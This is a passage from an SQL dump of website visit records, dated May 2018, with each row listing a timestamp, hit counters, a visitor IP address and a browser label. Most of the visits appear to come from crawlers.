376,1,1,0,0,'54.36.149.107','other'),(244022,1526091533,1,1,0,0,'54.36.149.90','other'),(244023,1526091655,1,1,0,0,'216.244.66.237','other'),(244024,1526091773,1,1,0,0,'54.36.149.79','other'),(244025,1526091909,1,1,0,0,'37.9.113.182','other'),(244026,1526092022,1,0,1,0,'66.249.64.28',''),(244027,1526092155,1,1,0,0,'54.36.149.7','other'),(244028,1526092379,1,1,0,0,'178.154.171.88','other'),(244029,1526092575,1,1,0,0,'54.36.148.193','other'),(244030,1526092838,1,1,0,0,'54.36.149.76','other'),(244031,1526093085,1,1,0,0,'54.36.148.217','other'),(244032,1526093769,1,1,0,0,'141.8.142.74','other'),(244033,1526094051,1,1,0,0,'54.36.148.32','other'),(244034,1526094125,1,1,0,0,'54.36.148.97','other'),(244035,1526094706,1,1,0,0,'54.36.149.68','other'),(244036,1526094860,1,1,0,0,'54.36.148.212','other'),(244037,1526095307,1,1,0,0,'54.36.149.65','other'),(244038,1526095442,1,0,1,0,'66.249.64.29',''),(244039,1526095457,1,1,0,0,'54.36.148.156','other'),(244040,1526095552,1,1,0,0,'54.36.149.7','other'),(244041,1526095738,1,1,0,0,'54.36.148.127','other'),(244042,1526095816,1,1,0,0,'54.36.148.64','other'),(244043,1526095850,1,1,0,0,'54.36.148.19','other'),(244044,1526096069,1,1,0,0,'54.36.149.96','other'),(244045,1526096565,1,1,0,0,'54.36.148.218','other'),(244046,1526096601,1,1,0,0,'8.29.198.27','other'),(244047,1526096626,1,1,0,0,'54.36.148.123','other'),(244048,1526096761,1,1,0,0,'54.36.148.188','other'),(244049,1526096957,1,1,0,0,'66.249.70.25','chrome'),(244050,1526096962,1,1,0,0,'66.249.64.29','chrome'),(244051,1526097417,1,1,0,0,'54.36.148.95','other'),(244052,1526097452,1,1,0,0,'54.36.149.80','other'),(244053,1526097774,1,1,0,0,'54.36.149.65','other'),(244054,1526098130,1,1,0,0,'54.36.148.26','other'),(244055,1526098560,1,1,0,0,'54.36.148.104','other'),(244056,1526098749,1,1,0,0,'157.55.39.60','other'),(244057,1526098805,1,1,0,0,'54.36.148.200','other'),(244058,1526099053,1,1,0,0,'54.36.149.52','other'),(244059,1526099422,1,1,0,0,'180.76.15.134','other'),(244060,1526099526,1,1,0,0,'54.36.148.220','other'),(244061,1526099559,1,0,1,0,'66.249.64.29',''),(244062,1526099826,1,0,1,0,'66.249.64.28',''),(244063,1526099862,1,1,0,0,'54.36.148.196','other'),(244064,1526099929,1,1,0,0,'54.36.148.80','other'),(244065,1526100187,1,1,0,0,'54.36.148.208','other'),(244066,1526100616,1,1,0,0,'54.36.149.87','other'),(244067,1526100659,1,1,0,0,'54.36.149.53','other'),(244068,1526100737,1,1,0,0,'54.36.149.21','other'),(244069,1526100787,1,1,0,0,'54.36.149.40','other'),(244070,1526100803,1,1,0,0,'54.36.148.207','other'),(244071,1526101067,1,1,0,0,'217.69.133.203','other'),(244072,1526101250,1,0,1,0,'66.249.64.28',''),(244073,1526101283,1,1,0,0,'54.36.148.119','other'),(244074,1526101296,1,1,0,0,'54.36.149.93','other'),(244075,1526101357,2,2,0,0,'216.244.66.237','other'),(244076,1526101434,1,1,0,0,'54.36.148.108','other'),(244077,1526101558,1,1,0,0,'54.36.149.72','other'),(244078,1526101685,1,1,0,0,'54.36.148.143','other'),(244079,1526101819,1,1,0,0,'54.36.148.198','other'),(244080,1526101848,1,1,0,0,'54.36.149.73','other'),(244081,1526101925,1,1,0,0,'8.29.198.25','other'),(244082,1526102333,1,0,1,0,'66.249.64.29',''),(244083,1526102360,1,1,0,0,'157.55.39.253','other'),(244084,1526102404,1,1,0,0,'37.9.113.182','other'),(244085,1526102614,1,0,1,0,'66.249.70.27',''),(244086,1526103003,1,1,0,0,'54.36.149.94','other'),(244087,1526103296,1,1,0,0,'54.36.148.180','other'),(244088,1526103308,1,1,0,0,'54.36.148.18','other'),(244089,1526103830,1,1,0,0,'216.244.66.237','other'),(244090,1526104043,1,1,0,0,'54.36.148.226','other'),(244091,1526104244,1,1,0,0,'54.36.149.45','other'),(244092,1526104312,1,1,0,0,'54.36.149.15','other'),(244093,1526104339,1,1,0,0,'91.209.11.236','other'),(244094,1526104490,1,1,0,0,'54.36.148.27','other'),(244095,1526104664,1,1,0,0,'54.36.148.183','other'),(244096,1526105024,1,1,0,0,'54.36.148.190','other'),(244097,1526105141,1,1,0,0,'54.36.148.165','other'),(244098,1526105348,1,1,0,0,'54.36.148.211','other'),(244099,1526105591,1,1,0,0,'54.36.148.246','other'),(244100,1526105899,1,1,0,0,'54.36.148.236','other'),(244101,1526106083,10,10,0,0,'69.58.178.58','other'),(244102,1526106229,1,1,0,0,'54.36.148.254','other'),(244103,1526106494,1,1,0,0,'217.69.133.3','other'),(244104,1526106784,1,1,0,0,'193.106.30.99','firefox'),(244105,1526106894,47,47,0,0,'144.76.104.213','other'),(244106,1526107001,1,1,0,0,'54.36.148.129','other'),(244107,1526107141,1,1,0,0,'178.154.171.88','other'),(244108,1526107223,1,1,0,0,'141.8.142.74','other'),(244109,1526107443,1,1,0,0,'8.29.198.25','other'),(244110,1526107459,1,1,0,0,'54.36.148.72','other'),(244111,1526107718,1,1,0,0,'54.36.148.132','other'),(244112,1526107789,1,1,0,0,'54.36.149.99','other'),(244113,1526107996,1,1,0,0,'91.209.11.236','other'),(244115,1526108004,1,1,0,0,'54.36.148.187','other'),(244116,1526108125,1,1,0,0,'54.36.148.160','other'),(244117,1526108315,1,0,1,0,'66.249.64.29',''),(244118,1526109731,1,1,0,0,'54.36.148.69','other'),(244119,1526109854,1,1,0,0,'54.36.149.85','other'),(244120,1526109859,1,1,0,0,'54.36.149.27','other'),(244121,1526109988,1,1,0,0,'157.55.39.253','other'),(244122,1526110203,1,1,0,0,'54.36.148.65','other'),(244123,1526110283,1,1,0,0,'178.95.247.110','chrome'),(244124,1526110317,1,1,0,0,'54.36.148.126','other'),(244125,1526110395,1,1,0,0,'54.36.148.245','other'),(244126,1526110411,1,1,0,0,'199.247.14.251','other'),(244127,1526110883,1,1,0,0,'54.36.148.190','other'),(244128,1526111079,1,1,0,0,'217.69.133.5','other'),(244129,1526111184,1,1,0,0,'54.36.148.140','other'),(244130,1526111449,1,1,0,0,'217.69.133.9','other'),(244131,1526112390,1,1,0,0,'54.36.149.77','other'),(244132,1526112686,1,1,0,0,'54.36.148.212','other'),(244133,1526112760,1,1,0,0,'8.29.198.25','other'),(244134,1526113011,1,1,0,0,'217.69.133.4','other'),(244135,1526113615,1,1,0,0,'54.36.148.123','other'),(244136,1526113737,1,1,0,0,'54.36.148.147','other'),(244137,1526114043,1,1,0,0,'54.36.148.218','other'),(244138,1526114688,1,1,0,0,'54.36.148.252','other'),(244139,1526114758,2,0,2,0,'66.249.64.30',''),(244140,1526114811,1,1,0,0,'216.244.66.237','other'),(244141,1526115267,1,1,0,0,'54.36.148.89','other'),(244142,1526115349,1,1,0,0,'141.8.142.74','other'),(244143,1526115889,1,1,0,0,'54.36.149.5','other'),(244144,1526116553,1,1,0,0,'54.36.148.77','other'),(244145,1526116882,1,1,0,0,'54.36.148.70','other'),(244146,1526116975,1,1,0,0,'199.58.86.209','other'),(244147,1526117232,1,1,0,0,'54.36.148.24','other'),(244148,1526118102,1,1,0,0,'54.36.148.135','other'),(244149,1526118182,1,1,0,0,'207.46.13.0','other'),(244150,1526118283,1,1,0,0,'8.29.198.26','other'),(244151,1526118348,1,1,0,0,'54.36.148.252','other'),(244152,1526118418,1,1,0,0,'54.36.149.71','other'),(244153,1526118547,2,2,0,0,'178.154.171.88','other'),(244154,1526118709,1,1,0,0,'54.36.149.19','other'),(244155,1526118743,1,1,0,0,'178.154.171.60','other'),(244156,1526119587,1,1,0,0,'54.36.149.91','other'),(244157,1526119697,1,1,0,0,'54.36.148.86','other'),(244158,1526119774,1,1,0,0,'54.36.149.76','other'),(244159,1526119780,1,1,0,0,'54.36.149.73','other'),(244160,1526119834,1,1,0,0,'54.36.149.19','other'),(244161,1526119931,1,1,0,0,'54.36.148.82','other'),(244162,1526120087,1,1,0,0,'54.36.149.44','other'),(244163,1526120330,1,1,0,0,'54.36.148.221','other'),(244164,1526120467,1,1,0,0,'178.154.171.88','other'),(244165,1526120528,1,1,0,0,'54.36.148.130','other'),(244166,1526120958,1,0,1,0,'66.249.64.29',''),(244167,1526121473,1,1,0,0,'66.249.70.27','chrome'),(244168,1526121478,1,1,0,0,'66.249.64.29','chrome'),(244169,1526121564,1,1,0,0,'54.36.149.95','other'),(244170,1526121586,1,1,0,0,'141.8.142.74','other'),(244171,1526122035,1,1,0,0,'54.36.148.92','other'),(244172,1526122378,1,1,0,0,'54.36.149.51','other'),(244173,1526122389,1,1,0,0,'91.209.11.236','other'),(244174,1526122525,1,1,0,0,'54.36.148.222','other'),(244175,1526122606,1,1,0,0,'54.36.148.189','other'),(244176,1526122892,1,1,0,0,'216.244.66.237','other'),(244177,1526122916,1,1,0,0,'54.36.148.243','other'),(244178,1526123391,1,1,0,0,'54.36.148.159','other'),(244179,1526123590,1,1,0,0,'8.29.198.25','other'),(244180,1526124216,1,1,0,0,'35.226.23.240','other'),(244181,1526124336,2,0,2,0,'66.249.64.30',''),(244182,1526124412,1,1,0,0,'54.36.149.94','other'),(244183,1526124578,1,1,0,0,'54.36.148.163','other'),(244184,1526124697,1,1,0,0,'54.36.148.205','other'),(244185,1526124791,1,1,0,0,'54.36.148.191','other'),(244186,1526124868,1,1,0,0,'54.36.148.218','other'),(244187,1526125088,2,2,0,0,'91.196.178.28','chrome'),(244188,1526125268,1,1,0,0,'54.36.149.90','other'),(244189,1526125435,1,1,0,0,'54.36.149.1','other'),(244190,1526125595,1,1,0,0,'141.8.142.74','other'),(244191,1526126464,1,1,0,0,'54.36.148.90','other'),(244192,1526126542,1,1,0,0,'54.36.149.75','other'),(244193,1526126622,1,1,0,0,'54.36.148.61','other'),(244194,1526127045,1,1,0,0,'142.44.159.96','other'),(244195,1526127442,1,1,0,0,'54.36.149.2','other'),(244196,1526127522,1,1,0,0,'54.36.148.152','other'),(244197,1526127620,1,1,0,0,'54.36.148.34','other'),(244198,1526127879,1,1,0,0,'54.36.148.19','other'),(244199,1526128102,1,1,0,0,'193.106.30.99','firefox'),(244200,1526128240,1,1,0,0,'141.8.132.19','other'),(244201,1526128554,1,1,0,0,'216.244.66.237','other'),(244202,1526128759,1,1,0,0,'54.36.149.74','other'),(244203,1526128841,1,1,0,0,'54.36.148.41','other'),(244204,1526129160,1,1,0,0,'8.29.198.25','other'),(244205,1526129215,1,1,0,0,'54.36.148.98','other'),(244206,1526129774,1,1,0,0,'54.36.148.69','other'),(244207,1526130195,1,1,0,0,'217.182.203.54','chrome'),(244208,1526130226,1,1,0,0,'54.36.149.8','other'),(244209,1526130272,1,1,0,0,'141.8.142.74','other'),(244210,1526130465,1,1,0,0,'54.36.148.34','other'),(244211,1526130523,1,1,0,0,'54.36.148.179','other'),(244212,1526130784,1,1,0,0,'54.36.148.92','other'),(244213,1526130828,1,1,0,0,'54.36.148.39','other'),(244214,1526131185,1,1,0,0,'54.36.148.171','other'),(244215,1526131230,1,1,0,0,'54.36.148.46','other'),(244216,1526131336,1,1,0,0,'141.8.142.74','other'),(244217,1526131441,1,1,0,0,'54.36.148.161','other'),(244218,1526131931,1,1,0,0,'54.36.149.83','other'),(244219,1526132165,1,1,0,0,'216.244.66.237','other'),(244220,1526132332,1,1,0,0,'141.8.142.74','other'),(244221,1526132469,1,1,0,0,'54.36.149.32','other'),(244222,1526132612,1,1,0,0,'54.36.148.102','other'),(244223,1526132800,1,1,0,0,'54.36.148.139','other'),(244224,1526132848,1,1,0,0,'54.36.148.239','other'),(244225,1526132926,2,2,0,0,'157.55.39.157','other'),(244226,1526133063,1,1,0,0,'54.36.148.32','other'),(244227,1526133064,1,1,0,0,'54.36.148.216','other'),(244228,1526133159,1,1,0,0,'54.36.148.80','other'),(244229,1526133324,1,1,0,0,'54.36.148.160','other'),(244230,1526133856,1,1,0,0,'54.36.148.227','other'),(244231,1526134282,1,1,0,0,'87.250.224.46','other'),(244232,1526134423,1,1,0,0,'8.29.198.27','other'),(244233,1526134468,1,1,0,0,'54.36.148.132','other'),(244234,1526134505,1,1,0,0,'178.154.171.88','other'),(244235,1526134585,1,1,0,0,'54.36.149.16','other'),(244236,1526134604,1,1,0,0,'54.36.148.182','other'),(244237,1526134624,1,1,0,0,'54.36.148.72','other'),(244238,1526134956,1,1,0,0,'54.36.148.28','other'),(244239,1526135010,1,1,0,0,'216.244.66.237','other'),(244240,1526135188,1,1,0,0,'54.36.148.238','other'),(244241,1526135562,1,1,0,0,'54.36.149.41','other'),(244242,1526135580,1,1,0,0,'54.36.148.95','other'),(244243,1526136265,1,1,0,0,'54.36.148.66','other'),(244244,1526136583,1,1,0,0,'54.36.148.245','other'),(244245,1526136589,1,0,1,0,'66.249.64.30',''),(244246,1526136705,1,1,0,0,'54.36.148.55','other'),(244247,1526136974,1,1,0,0,'54.36.148.192','other'),(244248,1526136990,1,1,0,0,'141.8.142.74','other'),(244249,1526137087,1,1,0,0,'66.249.70.25','chrome'),(244250,1526137092,1,1,0,0,'66.249.64.30','chrome'),(244251,1526137171,1,1,0,0,'54.36.148.74','other'),(244252,1526137415,1,1,0,0,'54.36.148.49','other'),(244253,1526137870,1,1,0,0,'54.36.148.121','other'),(244254,1526137932,1,1,0,0,'54.36.149.6','other'),(244255,1526137939,1,1,0,0,'54.36.148.50','other'),(244256,1526138235,1,1,0,0,'157.55.39.219','other'),(244257,1526138426,1,1,0,0,'54.36.148.47','other'),(244258,1526138799,1,0,1,0,'66.249.70.27',''),(244259,1526138853,1,1,0,0,'141.8.142.74','other'),(244260,1526138994,1,1,0,0,'54.36.149.51','other'),(244261,1526139405,1,1,0,0,'180.76.15.158','other'),(244262,1526139461,1,1,0,0,'54.36.149.3','other'),(244263,1526139558,1,1,0,0,'54.36.148.82','other'),(244264,1526139603,1,1,0,0,'54.36.149.95','other'),(244265,1526139944,1,1,0,0,'217.69.133.194','other'),(244266,1526140023,1,1,0,0,'8.29.198.27','other'),(244267,1526140248,1,1,0,0,'216.244.66.237','other'),(244268,1526140337,1,1,0,0,'54.36.149.61','other'),(244269,1526140565,1,1,0,0,'54.36.148.242','other'),(244270,1526141066,2,2,0,0,'141.8.142.74','other'),(244271,1526141075,1,1,0,0,'54.36.149.102','other'),(244272,1526141304,1,1,0,0,'46.161.9.39','firefox'),(244273,1526141340,1,1,0,0,'54.36.148.42','other'),(244274,1526141775,1,1,0,0,'188.230.43.254','other'),(244275,1526142035,1,1,0,0,'54.36.148.228','other'),(244276,1526142502,2,2,0,0,'141.8.142.74','other'),(244277,1526142764,1,1,0,0,'54.36.148.59','other'),(244278,1526143170,1,1,0,0,'54.36.149.95','other'),(244279,1526143245,1,1,0,0,'216.244.66.237','other'),(244280,1526143322,1,1,0,0,'54.36.148.61','other'),(244281,1526143346,1,1,0,0,'54.36.149.62','other'),(244282,1526143430,1,1,0,0,'54.36.148.253','other'),(244283,1526143542,1,1,0,0,'157.55.39.157','other'),(244284,1526143617,1,1,0,0,'141.8.142.74','other'),(244285,1526143844,1,1,0,0,'87.250.224.46','other'),(244286,1526143969,1,1,0,0,'66.249.64.30','chrome'),(244287,1526144043,1,1,0,0,'66.249.70.29','chrome'),(244288,1526144079,1,1,0,0,'54.36.148.12','other'),(244289,1526144181,1,1,0,0,'54.36.149.56','other'),(244290,1526144336,1,1,0,0,'54.36.148.158','other'),(244291,1526144341,1,1,0,0,'93.72.131.1','chrome'),(244292,1526144414,1,1,0,0,'188.230.43.254','other'),(244293,1526144565,1,1,0,0,'54.36.148.185','other'),(244294,1526144625,2,2,0,0,'141.8.142.74','other'),(244295,1526145014,1,1,0,0,'54.36.148.155','other'),(244296,1526145032,1,1,0,0,'54.36.148.166','other'),(244297,1526145251,1,1,0,0,'8.29.198.26','other'),(244298,1526145263,1,1,0,0,'54.36.148.81','other'),(244299,1526145390,1,1,0,0,'217.69.133.203','other'),(244300,1526145559,1,1,0,0,'217.69.133.3','other'),(244301,1526145720,1,1,0,0,'54.36.148.157','other'),(244302,1526145743,1,1,0,0,'54.36.149.28','other'),(244303,1526145805,1,1,0,0,'141.8.142.74','other'),(244304,1526145809,1,1,0,0,'178.154.171.88','other'),(244305,1526146031,1,1,0,0,'54.36.149.79','other'),(244306,1526146548,1,1,0,0,'54.36.148.89','other'),(244307,1526146946,1,1,0,0,'54.36.148.20','other'),(244308,1526147104,1,1,0,0,'216.244.66.237','other'),(244309,1526147464,1,1,0,0,'157.55.39.219','other'),(244310,1526147514,1,1,0,0,'54.36.148.101','other'),(244311,1526147671,1,1,0,0,'54.36.149.73','other'),(244312,1526147684,1,1,0,0,'54.36.149.47','other'),(244313,1526147707,1,1,0,0,'91.209.11.236','other'),(244314,1526148295,1,1,0,0,'216.244.66.237','other'),(244315,1526148371,1,1,0,0,'54.36.149.7','other'),(244316,1526148740,1,1,0,0,'54.36.148.61','other'),(244317,1526148785,1,1,0,0,'141.8.142.74','other'),(244318,1526148794,1,1,0,0,'54.36.148.50','other'),(244319,1526148819,1,1,0,0,'46.161.9.39','firefox'),(244320,1526149402,1,1,0,0,'54.36.148.69','other'),(244321,1526149408,1,1,0,0,'54.36.148.115','other'),(244322,1526149588,1,1,0,0,'54.36.148.24','other'),(244323,1526149609,1,1,0,0,'157.55.39.219','other'),(244324,1526149809,1,1,0,0,'54.36.149.51','other'),(244325,1526149906,2,2,0,0,'178.92.84.197','chrome'),(244326,1526149952,1,1,0,0,'54.36.148.202','other'),(244327,1526150028,1,1,0,0,'54.36.149.35','other'),(244328,1526150670,1,1,0,0,'54.36.148.26','other'),(244329,1526150721,1,1,0,0,'54.36.148.162','other'),(244330,1526150810,1,1,0,0,'54.36.148.194','other'),(244331,1526150871,1,1,0,0,'8.29.198.26','other'),(244332,1526150982,1,1,0,0,'54.36.148.90','other'),(244333,1526151206,1,1,0,0,'54.36.148.173','other'),(244334,1526151508,1,1,0,0,'54.36.148.24','other'),(244335,1526151681,1,1,0,0,'193.106.30.99','firefox'),(244336,1526151852,1,1,0,0,'54.36.149.95','other'),(244337,1526151964,1,1,0,0,'54.36.148.80','other'),(244338,1526151970,1,1,0,0,'91.214.85.251','firefox'),(244339,1526152319,1,1,0,0,'216.244.66.237','other'),(244340,1526152698,1,1,0,0,'54.36.148.192','other'),(244341,1526152782,1,1,0,0,'54.36.148.95','other'),(244342,1526153193,1,1,0,0,'188.18.249.88','chrome'),(244343,1526153314,1,1,0,0,'216.244.66.237','other'),(244344,1526153377,1,1,0,0,'54.36.149.18','other'),(244345,1526153426,1,1,0,0,'54.36.148.211','other'),(244346,1526153430,1,1,0,0,'54.36.148.221','other'),(244347,1526153638,1,1,0,0,'141.8.142.74','other'),(244348,1526153880,1,1,0,0,'54.36.148.207','other'),(244349,1526153963,1,1,0,0,'54.36.148.186','other'),(244350,1526154167,1,1,0,0,'54.36.149.37','other'),(244351,1526154281,1,1,0,0,'54.36.148.188','other'),(244352,1526154728,1,1,0,0,'54.36.149.35','other'),(244353,1526155148,1,1,0,0,'141.8.142.167','other'),(244354,1526155450,1,1,0,0,'54.36.149.68','other'),(244355,1526155762,1,1,0,0,'54.36.149.87','other'),(244356,1526155866,1,1,0,0,'54.36.149.90','other'),(244357,1526156038,1,1,0,0,'66.249.64.30','chrome'),(244358,1526156086,1,1,0,0,'8.29.198.25','other'),(244359,1526156166,1,1,0,0,'54.36.148.232','other'),(244360,1526156167,1,0,1,0,'66.249.64.29',''),(244361,1526156374,1,1,0,0,'207.46.13.0','other'),(244362,1526156629,1,1,0,0,'54.36.148.102','other'),(244363,1526156888,1,1,0,0,'54.36.149.91','other'),(244364,1526157467,1,1,0,0,'216.244.66.237','other'),(244365,1526157519,1,1,0,0,'141.8.142.74','other'),(244366,1526157604,1,1,0,0,'207.46.13.0','other'),(244367,1526157824,1,1,0,0,'54.36.148.231','other'),(244368,1526157874,1,1,0,0,'54.36.149.31','other'),(244369,1526158440,1,1,0,0,'216.244.66.237','other'),(244370,1526158511,1,1,0,0,'141.8.142.74','other'),(244371,1526158587,1,1,0,0,'91.209.11.236','other'),(244372,1526158720,1,1,0,0,'54.36.149.83','other'),(244373,1526158827,1,1,0,0,'54.36.148.183','other'),(244374,1526159009,1,1,0,0,'54.36.148.80','other'),(244375,1526159224,1,1,0,0,'54.36.149.68','other'),(244376,1526159236,1,1,0,0,'54.36.148.22','other'),(244377,1526159291,1,1,0,0,'54.36.148.62','other'),(244378,1526159417,1,1,0,0,'54.36.148.170','other'),(244379,1526159734,1,1,0,0,'157.55.39.219','other'),(244380,1526159837,1,1,0,0,'141.8.142.74','other'),(244381,1526159851,1,1,0,0,'216.244.66.237','other'),(244382,1526159949,1,1,0,0,'157.55.39.60','other'),(244383,1526160004,1,1,0,0,'54.36.148.241','other'),(244384,1526160237,1,1,0,0,'87.250.224.46','other'),(244385,1526161016,1,1,0,0,'54.36.148.150','other'),(244386,1526161018,1,1,0,0,'54.36.149.8','other'),(244387,1526161025,1,1,0,0,'54.36.149.56','other'),(244388,1526161064,1,1,0,0,'54.36.148.25','other'),(244389,1526161067,1,1,0,0,'54.36.148.113','other'),(244390,1526161714,1,1,0,0,'8.29.198.26','other'),(244391,1526161867,1,0,1,0,'66.249.70.27',''),(244392,1526161975,1,1,0,0,'216.244.66.237','other'),(244393,1526162170,1,1,0,0,'54.36.148.81','other'),(244394,1526162291,1,1,0,0,'54.36.149.84','other'),(244395,1526162303,1,1,0,0,'54.36.148.210','other'),(244396,1526162335,1,1,0,0,'217.69.133.5','other'),(244397,1526162356,1,1,0,0,'54.36.148.45','other'),(244398,1526162484,1,1,0,0,'54.36.149.101','other'),(244399,1526162516,1,1,0,0,'157.55.39.219','other'),(244400,1526162773,1,1,0,0,'54.36.149.79','other'),(244401,1526162776,1,1,0,0,'54.36.148.66','other'),(244402,1526162825,1,1,0,0,'54.36.148.206','other'),(244403,1526162977,1,1,0,0,'217.69.133.194','other'),(244404,1526163057,1,1,0,0,'54.36.149.43','other'),(244405,1526163438,1,1,0,0,'87.250.224.46','other'),(244406,1526163457,1,1,0,0,'141.8.142.152','other'),(244407,1526163471,2,2,0,0,'141.8.132.19','other'),(244408,1526163482,1,1,0,0,'54.36.148.193','other'),(244410,1526163530,1,1,0,0,'54.36.148.204','other'),(244411,1526163831,2,2,0,0,'141.8.142.74','other'),(244412,1526164233,1,1,0,0,'216.244.66.237','other'),(244413,1526164476,1,1,0,0,'54.36.148.56','other'),(244414,1526164523,1,1,0,0,'54.36.149.97','other'),(244415,1526164743,1,1,0,0,'54.36.149.7','other'),(244416,1526164861,1,1,0,0,'178.154.171.88','other'),(244417,1526165413,1,1,0,0,'54.36.148.251','other'),(244418,1526165643,1,1,0,0,'54.36.148.206','other'),(244419,1526165846,1,1,0,0,'54.36.149.74','other'),(244420,1526165876,1,1,0,0,'35.226.23.240','other'),(244421,1526166085,1,1,0,0,'54.36.148.22','other'),(244422,1526166721,1,1,0,0,'54.36.148.253','other'),(244423,1526166918,1,1,0,0,'8.29.198.25','other'),(244424,1526167076,1,1,0,0,'54.36.148.43','other'),(244425,1526167660,1,1,0,0,'54.36.148.129','other'),(244426,1526167678,1,1,0,0,'54.36.148.146','other'),(244427,1526168425,1,1,0,0,'217.69.133.2','other'),(244428,1526168484,1,1,0,0,'54.36.148.180','other'),(244429,1526168496,1,0,1,0,'66.249.70.25',''),(244430,1526168686,1,1,0,0,'54.36.149.28','other'),(244431,1526168774,1,0,1,0,'66.249.70.27',''),(244432,1526169076,1,1,0,0,'54.36.148.99','other'),(244433,1526169160,1,1,0,0,'54.36.148.72','other'),(244434,1526169269,1,0,1,0,'66.249.64.28',''),(244435,1526169388,1,1,0,0,'54.36.148.140','other'),(244436,1526169828,1,1,0,0,'54.36.149.93','other'),(244437,1526170128,1,1,0,0,'54.36.149.25','other'),(244438,1526170340,1,1,0,0,'54.36.148.154','other'),(244439,1526170380,1,1,0,0,'141.8.142.74','other'),(244440,1526170594,1,1,0,0,'54.36.148.116','other'),(244441,1526171325,1,1,0,0,'54.36.149.72','other'),(244442,1526171922,1,1,0,0,'54.36.149.90','other'),(244443,1526172548,1,1,0,0,'54.36.148.148','other'),(244444,1526172559,1,1,0,0,'8.29.198.25','other'),(244445,1526172800,1,1,0,0,'54.36.148.223','other'),(244446,1526173032,1,1,0,0,'54.36.148.45','other'),(244447,1526173343,1,1,0,0,'54.36.149.102','other'),(244448,1526173357,1,1,0,0,'178.154.171.88','other'),(244449,1526173443,1,1,0,0,'141.8.142.74','other'),(244450,1526173454,1,1,0,0,'35.226.23.240','other'),(244451,1526173707,1,1,0,0,'54.36.148.92','other'),(244452,1526174023,1,1,0,0,'54.36.148.40','other'),(244453,1526174086,1,1,0,0,'54.36.149.67','other'),(244454,1526174422,1,1,0,0,'141.8.142.74','other'),(244455,1526174489,1,1,0,0,'178.154.171.88','other'),(244456,1526174909,1,1,0,0,'54.36.148.11','other'),(244457,1526175202,1,1,0,0,'5.8.46.135','chrome'),(244458,1526175251,1,1,0,0,'180.76.15.17','other'),(244459,1526175364,1,1,0,0,'193.106.30.99','firefox'),(244460,1526176343,1,1,0,0,'35.226.23.240','other'),(244461,1526177471,1,1,0,0,'141.8.142.74','other'),(244462,1526177559,1,1,0,0,'217.69.133.6','other'),(244463,1526177760,1,1,0,0,'8.29.198.26','other'),(244464,1526177767,1,1,0,0,'216.244.66.237','other'),(244465,1526178547,1,1,0,0,'95.25.136.15','chrome'),(244466,1526178685,2,2,0,0,'178.154.171.88','other'),(244467,1526179568,1,1,0,0,'216.244.66.237','other'),(244468,1526179580,1,1,0,0,'141.8.142.74','other'),(244469,1526181467,3,3,0,0,'141.8.142.74','other'),(244470,1526181711,1,1,0,0,'85.203.22.91','firefox'),(244471,1526182581,1,1,0,0,'141.8.142.74','other'),(244472,1526183402,1,1,0,0,'8.29.198.27','other'),(244473,1526184250,1,1,0,0,'141.8.142.74','other'),(244474,1526184620,1,1,0,0,'216.244.66.237','other'),(244475,1526184650,1,1,0,0,'13.56.232.243','chrome'),(244476,1526184686,1,1,0,0,'37.9.113.182','other'),(244477,1526185457,1,1,0,0,'217.69.133.4','other'),(244478,1526185460,2,2,0,0,'141.8.142.74','other'),(244479,1526185619,2,2,0,0,'178.154.171.88','other'),(244480,1526187568,1,1,0,0,'178.154.171.88','other'),(244481,1526188084,1,1,0,0,'95.25.136.15','firefox'),(244482,1526188590,1,1,0,0,'8.29.198.27','other'),(244483,1526189438,1,1,0,0,'178.154.171.55','other'),(244484,1526190210,1,1,0,0,'178.154.171.88','other'),(244485,1526191150,1,1,0,0,'178.154.171.60','other'),(244486,1526191657,1,1,0,0,'216.244.66.237','other'),(244487,1526192631,67,67,0,0,'144.76.29.66','other'),(244488,1526192883,1,1,0,0,'180.76.15.6','other'),(244489,1526193582,1,1,0,0,'87.250.224.46','other'),(244490,1526193585,1,1,0,0,'37.9.113.186','other'),(244491,1526193750,1,1,0,0,'178.154.200.73','other'),(244492,1526194248,1,1,0,0,'8.29.198.27','other'),(244493,1526194573,1,1,0,0,'157.55.39.219','other'),(244494,1526195081,1,1,0,0,'37.9.113.114','other'),(244495,1526195659,1,1,0,0,'54.165.59.7','other'),(244496,1526195692,1,1,0,0,'141.8.132.22','other'),(244497,1526195774,1,1,0,0,'178.154.200.73','other'),(244498,1526196549,2,2,0,0,'95.213.141.126','opera'),(244499,1526196555,1,1,0,0,'213.180.203.7','other'),(244500,1526197385,1,1,0,0,'37.9.113.110','other'),(244501,1526197912,1,1,0,0,'178.154.171.55','other'),(244502,1526197945,2,2,0,0,'178.92.84.197','chrome'),(244503,1526197989,1,1,0,0,'193.106.30.99','firefox'),(244504,1526199015,1,1,0,0,'5.45.207.82','other'),(244505,1526199414,1,1,0,0,'8.29.198.26','other'),(244506,1526199884,1,1,0,0,'54.229.219.190','chrome'),(244507,1526200403,1,1,0,0,'37.9.113.132','other'),(244508,1526200749,1,1,0,0,'207.46.13.0','other'),(244509,1526200849,1,1,0,0,'216.244.66.237','other'),(244510,1526200982,1,1,0,0,'217.69.133.2','other'),(244511,1526201516,1,1,0,0,'5.45.207.83','other'),(244512,1526201836,1,1,0,0,'91.196.178.39','chrome'),(244513,1526202629,1,1,0,0,'217.69.133.3','other'),(244514,1526202679,1,1,0,0,'178.255.215.94','other'),(244515,1526202798,1,1,0,0,'5.45.207.82','other'),(244516,1526202878,2,2,0,0,'141.8.142.167','other'),(244517,1526202881,1,1,0,0,'37.9.113.82','other'),(244518,1526203098,1,1,0,0,'54.36.149.9','other'),(244519,1526203273,1,1,0,0,'54.36.148.102','other'),(244520,1526203964,1,1,0,0,'37.9.113.182','other'),(244521,1526204224,1,1,0,0,'54.36.148.144','other'),(244522,1526204400,1,1,0,0,'87.250.224.46','other'),(244523,1526204466,1,1,0,0,'54.36.148.62','other'),(244524,1526204529,1,1,0,0,'54.36.148.206','other'),(244525,1526204798,1,1,0,0,'54.36.148.82','other'),(244526,1526204893,1,1,0,0,'162.210.196.97','other'),(244527,1526204984,1,1,0,0,'216.244.66.237','other'),(244528,1526205098,1,1,0,0,'8.29.198.25','other'),(244529,1526205110,1,1,0,0,'207.46.13.170','other'),(244530,1526205289,1,1,0,0,'54.36.149.53','other'),(244531,1526205381,1,1,0,0,'37.9.113.100','other'),(244532,1526205416,1,1,0,0,'54.36.148.161','other'),(244533,1526205913,1,1,0,0,'54.36.148.60','other'),(244534,1526205925,1,1,0,0,'54.36.149.83','other'),(244535,1526205969,1,1,0,0,'54.36.148.247','other'),(244536,1526206251,1,1,0,0,'54.36.148.250','other'),(244537,1526206440,1,1,0,0,'54.36.148.14','other'),(244538,1526206570,1,1,0,0,'54.36.148.185','o